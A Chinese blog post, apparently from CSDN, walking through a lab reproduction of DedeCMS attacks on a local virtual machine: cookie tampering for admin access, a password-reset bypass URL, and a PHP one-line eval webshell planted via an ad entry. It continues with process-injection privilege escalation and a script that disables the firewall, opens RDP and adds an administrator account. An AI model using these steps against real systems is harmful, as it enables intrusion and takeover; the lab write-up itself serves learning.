渗透测试实战--dedecms漏洞复现

最新推荐文章于 2024-03-13 21:23:03 发布
最新推荐文章于 2024-03-13 21:23:03 发布
阅读量5.6k 收藏 31
点赞数 8
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45070118/article/details/99707561
版权

实验设备:一台windows服务器,一台kali,一台windows客户端

在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5
物理机安装jdk,建立java环境,由此来运行菜刀

在这里插入图片描述
网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机登录这个网站(刚开始就点下一步下一步,中间要设置root密码,里面也会显示admin密码)

在这里插入图片描述

我们注册一个用户000001,密码为123123,一个test用户,密码为123123
在admin后台将自己设置为会员,现实中就相当于自己充值会员,拥有会员权限
将用户设置为000001是因为管理员的用户是1所以通过抓包将自己的用户名变为1

在这里插入图片描述

登录自己的账号
在这里插入图片描述
打开burpsuite抓包

在这里插入图片描述
点击个人空间
在这里插入图片描述

取cookie中的last_vid__ckMd5 值 替换dedeuserid_ckMd5值 和Dedeuserid改为00001
在这里插入图片描述

然后on放过,别点forword
在这里插入图片描述
出来后发现已经是admin登录了
发生了越权
在这里插入图片描述
F12修改这三处
在这里插入图片描述
进入网站主页观看

在这里插入图片描述

运行重置密码链接,抓包
192.168.10.5/dedecms/member/resetpassword.php?dopost=safequestion&safequestion=0.0&id=1
在这里插入图片描述
ctrl+R
在这里插入图片描述

进入repeater然后确认下面三个数据和之前要求的一样然后直接点go
在这里插入图片描述
出现右边的数据
把图中的url修改,amp;去掉
如下,抓到的这是一个临时修改密码的url
http://192.168.10.5/dedecms/member/resetpassword.php?dopost=getpasswd&id=1& key=ro0tKeP6
进入网页可以修改密码
在这里插入图片描述
在这里插入图片描述
修改成功

这个密码只能在这个网页临时登录,不能推出从外面登录,因为这只是个临时密码

进入dede直接进入后台
在这里插入图片描述
新建广告
在这里插入图片描述

添加广告
在内容中输入一句话木马

<?php @eval($_POST[cmd]);?>

在这里插入图片描述
提交后出现一个路径
在这里插入图片描述
打开中国菜刀,将上面的路径填在url后

在这里插入图片描述
连接成功

在这里插入图片描述

提权

将pinjector拖入
用进程注入提权
在这里插入图片描述

pinjector -l
查看所有进程的权限
在这里插入图片描述
找到system权限的进程
在这里插入图片描述
pinjector -p 进程的UID cmd 4567

在这里插入图片描述

kali端监听
在这里插入图片描述
写一个脚本
内容为:关防火墙
开3389端口
创建用户
加入管理员组

在这里插入图片描述
用中国菜刀把脚本拖入目标
在kali中打开脚本

在这里插入图片描述
主机进行远程连接
在这里插入图片描述
连接成功
在这里插入图片描述

安全小菜鸡
关注
  • 8
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现
Continuejww的博客
08-30 2221
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞
DedeCMS漏洞复现
qq_52223347的博客
03-10 986
介绍 织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,目前占领了国内开源CMS的大部份市场,目前已经有超过三十万个站点正在使用织梦CMS或基于织梦CMS核心开发。 官方网站: http://www.dedecms.com/ 环境搭建 phpstudy 创建数据库 解压源码到www下 Dedecms_v5.7ps2 访问 DedeCMS/uploads/install/index.php 安装 安装完成–》登陆后台 任意文件操作漏洞复现 进到网站后台–》访问 dede/tpl.php?act
dedecms漏洞简单复现
qq_53639387的博客
11-26 2853
一.利用phpstudy来搭建dedecms网站(下载phpstudy) 下载可以在官网下https://www.xp.cn/download.html 安装完成 设置如下 二.下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-GBK-SP2-Full.tar.gz 将其解压然后将文件名为uploads里面的文件复制到 phpstudy_pro文件中的www中三.安装dedecms ...
DedeCms织梦系统漏洞复现
LIU6636LIU的博客
03-13 1936
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
dedecms 文件上传 (CVE-2019-8933)漏洞复现
weixin_42675091的博客
09-03 3384
dedecms 文件上传 (CVE-2019-8933)
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7943
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
wLHK-Dedecms漏洞整理.pdf
09-20
wLHK-Dedecms漏洞整理 从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞的整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
webshell获取总结-cookices和dedecms靶场环境
最新发布
06-12
南方数据企业网站管理系统 V7.0 后台主要功能如下: ...发布网站公告;进行网站配置;网站统计和数据库备份,为保证您的数据安全本系统采用了数据库备份功能;上传文件管理,管理你增加产品时上传的图片及其他文件。...
商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip
06-15
- 由于是较旧的版本,可能存在已知的安全漏洞,使用时需注意定期更新和安全维护,防止被黑客攻击。 - 建议升级到最新稳定版,以获得最新的安全补丁和功能改进。 6. **社区支持**: - DedeCms拥有活跃的用户社区...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
漏洞复现DeDeCMS织梦
qq_53188113的博客
11-25 3065
目录 一、复现环境 二、复现过程及环境 一、复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 二、复现过程及环境 安装 DeDeCMS 首先,利用PHPstudy安装环境 点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写 回到文件夹,打开 DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可 域名/install/ 进入安装页面 填写好..
DedeCMS_v5.7漏洞复现
热门推荐
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
Dedecms V5.7 sp2后台getshell漏洞复现(第一处)
weixin_42558965的博客
09-28 1081
前言:为了简便,试用了phpstudy 下载dedecms V5.7 sp2 使用phpstudy新建网站www.dedtest.com,并将下载的dedecms V5.7 sp2复制到其网站目录下,然后建站 开始复现 漏洞的只要原因是出现在了C:\phpstudy_pro\WWW\www.dedtest.com\dede文件夹下的sys_varifiles.php文件,一下为代码: /*----------------------- 下载文件 function _getfiles() ----------
DedeCMS_v5.7其他漏洞复现
wutiangui的博客
09-12 523
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码。管理员在添加用户购买商品的配送方式时,可能会触发存储型xss。进入后台—>会员—>配货方式设置—>增加一个配货方式。二、后台shops_delivery_存储型XSS。后台modifytmp.inc被写入了新内容。三、sys_verifies后台文件写入。用户在购买商品时会自动弹出配送方式列表。版本:5.7sp1、5.7sp2。访问后发现直接转到百度。
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
cheng___yu_的博客
12-14 2112
一、漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2.漏洞限制 1、 只影响前台账户 2、 只能修改未设置安全问题的账户 3.影响版本 DeDeCMSV
B:DeDeCMS用户权限更改 漏洞复现
weixin_53130100的博客
12-02 2270
DeDeCMS用户权限更改:1.安装phpstduy 2安装DeDeCMS 3.漏洞复现 4漏洞影响
dedecms5.7 sp2前台修改任意用户密码漏洞复现
weixin_46801402的博客
07-29 909
DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 dedecms5.7 sp2允许用户修改任意前台用户的密码,不能对管理员账户造成影响,毕竟管理员账户与前台用户的数据表时分开存放的。而且,前台也不能直接登录管理员账户...
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5456
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输入值和这个输入值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进入我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
dedecms漏洞复现
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值